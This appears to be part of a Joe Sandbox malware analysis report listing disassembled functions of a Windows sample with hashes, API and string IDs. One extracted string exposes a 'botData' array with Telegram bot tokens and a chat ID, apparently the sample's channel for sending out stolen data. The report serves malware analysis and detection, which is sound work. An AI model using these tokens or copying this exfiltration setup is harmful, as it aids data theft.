                                                                                                                                                                  • Instruction Fuzzy Hash: B7B1FA32A1964686EF64FF21E811AB9B3B0FB60BA8F805231DA4D436C5DF7CE541CB50
                                                                                                                                                                  Function 00007FF72CA0A1C8 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                  • Opcode ID: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                  • Instruction ID: 8d58beea350a47e1877370d0d09b0cc53c8cb72fc3a925c56b1938c3a3d6216c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                  • Instruction Fuzzy Hash: 52A13663A487C546EB21DB35A800BADB7A1EB647E4F848131DE8E47791DE3DE801CB11
                                                                                                                                                                  Function 00007FF72C9FACDC Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                  • Opcode ID: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                  • Instruction ID: b4a7f8995cc79daf55304aeda5c6531340392747eed528ab34f4555e9fdb25be
                                                                                                                                                                  • Opcode Fuzzy Hash: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DB1C37294874586E764DF39C85013CBBB8E765B68FA44235CB8E473A5CF39D851CB20
                                                                                                                                                                  Function 00007FF72CA03D40 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 485612231-578493202
                                                                                                                                                                  • Opcode ID: 0a04de855e384359884498a592c7ecc487ff7f476ea49e62146686d871cd2c8d
                                                                                                                                                                  • Instruction ID: 33102870819df548c4659e7a2f3ba6163d8917d9ec967e6bd1693216000cbbc9
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a04de855e384359884498a592c7ecc487ff7f476ea49e62146686d871cd2c8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8341F772718A5482FF04DF2AED24569A7B1FB58FE0B449032EE0D87B54DE3CD0418700
                                                                                                                                                                  Function 00007FF72CA11EF8 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                  • Instruction ID: 5659a7848457daeb62ab92df6f8df3ceec2aea3096663a6a0f40c7cd86de71c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                  • Instruction Fuzzy Hash: 02B09220E0BA0AC2EA083B117C43B14A2B4FF68720FC48039C04D62320DF2C21A59B61
                                                                                                                                                                  Function 00007FF72C9FEAF8 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
                                                                                                                                                                  • Instruction ID: 9d681cf890321f4175e19abd51554673af872471e27e38d115e361a8311eb8f6
                                                                                                                                                                  • Opcode Fuzzy Hash: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
                                                                                                                                                                  • Instruction Fuzzy Hash: 02915A22B182C646FB686E25AC103B9B69CEF607A4F940539DE9E47BC0DD3CE5059F20
                                                                                                                                                                  Function 00007FF72CA02040 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: dfda4f9ad7a0481674982879640de7724937c426c61b966dad04799febece311
                                                                                                                                                                  • Instruction ID: 268fd1acc533b8b435a2cc3cd346063d63e0d0acf21978aca71823448da3ce89
                                                                                                                                                                  • Opcode Fuzzy Hash: dfda4f9ad7a0481674982879640de7724937c426c61b966dad04799febece311
                                                                                                                                                                  • Instruction Fuzzy Hash: F381BF72A04B0186FB64AE65A891B7D6370FB94BE8F904636EE1E97784CF38D041CB10
                                                                                                                                                                  Function 00007FF72CA0ACDC Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
                                                                                                                                                                  • Instruction ID: 557106096e7eea89eb66725a09733fef8f6cd645158dd9910023608371c70936
                                                                                                                                                                  • Opcode Fuzzy Hash: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
                                                                                                                                                                  • Instruction Fuzzy Hash: C381D472A4878146F774DB29B88076AB6A0FB657E4F904235EA8F43B95DE3CD8408F10
                                                                                                                                                                  Function 00007FF72CA0DAD4 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
                                                                                                                                                                  • Instruction ID: 570996fb904ba885a027aae6f86b8006aff54c322fefe6538ca7d789be9ea69f
                                                                                                                                                                  • Opcode Fuzzy Hash: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
                                                                                                                                                                  • Instruction Fuzzy Hash: DC61D623E1C29246FB64A938AC50B79E5E1EF717F0F940639DA1D466C5DE6EE840CF20
                                                                                                                                                                  Function 00007FF72C9FA698 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                                                                  • Instruction ID: 01949189d5c4309c939527bbb34f01fe97bbed1ef16870b952279edebd594028
                                                                                                                                                                  • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51A436A5865586E7249B29C84063DB7B4EB68F68F648131CE8D077B4DF3AEC43CB50
                                                                                                                                                                  Function 00007FF72C9FA290 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                                                                  • Instruction ID: 2b2e5437f000531a6e93b5a511875f7f09ea473aca922ba19e3f9a270eab7042
                                                                                                                                                                  • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                                                                  • Instruction Fuzzy Hash: 4451A332B5865185E7249B29C44423CB7A5EB65B68FA48131CECC177A8CF7AEC43CB50
                                                                                                                                                                  Function 00007FF72C9D97C0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
                                                                                                                                                                  • Instruction ID: 9999d56e7c23189dd9fdb749272964b8532742cda1979c0ae33c4a27cef678d2
                                                                                                                                                                  • Opcode Fuzzy Hash: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D6766280F14BE69CE6794C2D87567D1C76A342791813BFF86963C8C92DD600CB30
                                                                                                                                                                  Function 00007FF72CA18D10 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                  • Instruction ID: b009cc91b1b526b1c1710c3d81186a5aeeb17e83158acf2cf67a81ce2a85e5bb
                                                                                                                                                                  • Opcode Fuzzy Hash: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                  • Instruction Fuzzy Hash: 04F068727186558ADBA49F28BC03E2A77E0F718394F80813AD58D87F14D63C90509F54
                                                                                                                                                                  Function 00007FF72C9F1DC4 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1644ec3eacfb1717bcdc515449fb8f4b10f687b16a8994b1b50383844e9242d5
                                                                                                                                                                  • Instruction ID: 0b1fcd0dbdef5f79f5781780b52bf8a478f7722c3bfc003610095dd94a268e73
                                                                                                                                                                  • Opcode Fuzzy Hash: 1644ec3eacfb1717bcdc515449fb8f4b10f687b16a8994b1b50383844e9242d5
                                                                                                                                                                  • Instruction Fuzzy Hash: F8C01220F0AA02C2E9883B12BC838249270EF3A762FD49135C10C12320CE2C60D2CF72
                                                                                                                                                                  Function 00007FF72C9F38CC Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                  • Instruction ID: f354353a037df65a7bf579b5e3593c146f5266bc56072eeb3326ecb9b14fc1d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 39A00121A0899696E644AB00EC51820A274EB60720B804172C14D614649E2CE8418B61
                                                                                                                                                                  Function 00007FF72C9ECDF0 Relevance: 40.6, APIs: 6, Strings: 17, Instructions: 389COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: : $*L\(&.$All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
                                                                                                                                                                  • API String ID: 3668304517-589830229
                                                                                                                                                                  • Opcode ID: cc11592e65fd13451adeeb98bed7833fa40bbb17b672aa069e055ba8664012c3
                                                                                                                                                                  • Instruction ID: 09ef3f5877c37ff189095fb58e600a3de06faf391f999a56728e587f1e7f7043
                                                                                                                                                                  • Opcode Fuzzy Hash: cc11592e65fd13451adeeb98bed7833fa40bbb17b672aa069e055ba8664012c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF1C362A0C7C285EB10BB25EC403E9A761EF757B8F805132E99D07799EE7CE544CB60
                                                                                                                                                                  Function 00007FF72C9BADB0 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 461COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $*L\(&.$Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 3668304517-1448338793
                                                                                                                                                                  • Opcode ID: 05a2b39d355bc7042101a22961d42901ce36d4bafcebd1a0fc7ea5d42ad93f7f
                                                                                                                                                                  • Instruction ID: 0f0411b33d4b85789a0bf31bf8dca1b3b008ff0e9f85b16ad5e79817eabe8160
                                                                                                                                                                  • Opcode Fuzzy Hash: 05a2b39d355bc7042101a22961d42901ce36d4bafcebd1a0fc7ea5d42ad93f7f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B22C122B18A8295EB10EF64DC403ECB3B0FB547A8F944231DA9D57A99EF78E541CB50
                                                                                                                                                                  Function 00007FF72C9E1410 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 393COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: for detail.$See
                                                                                                                                                                  • API String ID: 3668304517-4250990345
                                                                                                                                                                  • Opcode ID: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
                                                                                                                                                                  • Instruction ID: 22efcbb91e3b143c3f2e369e8ae124fcb3b4176f0b18aac762bd8d18719f830d
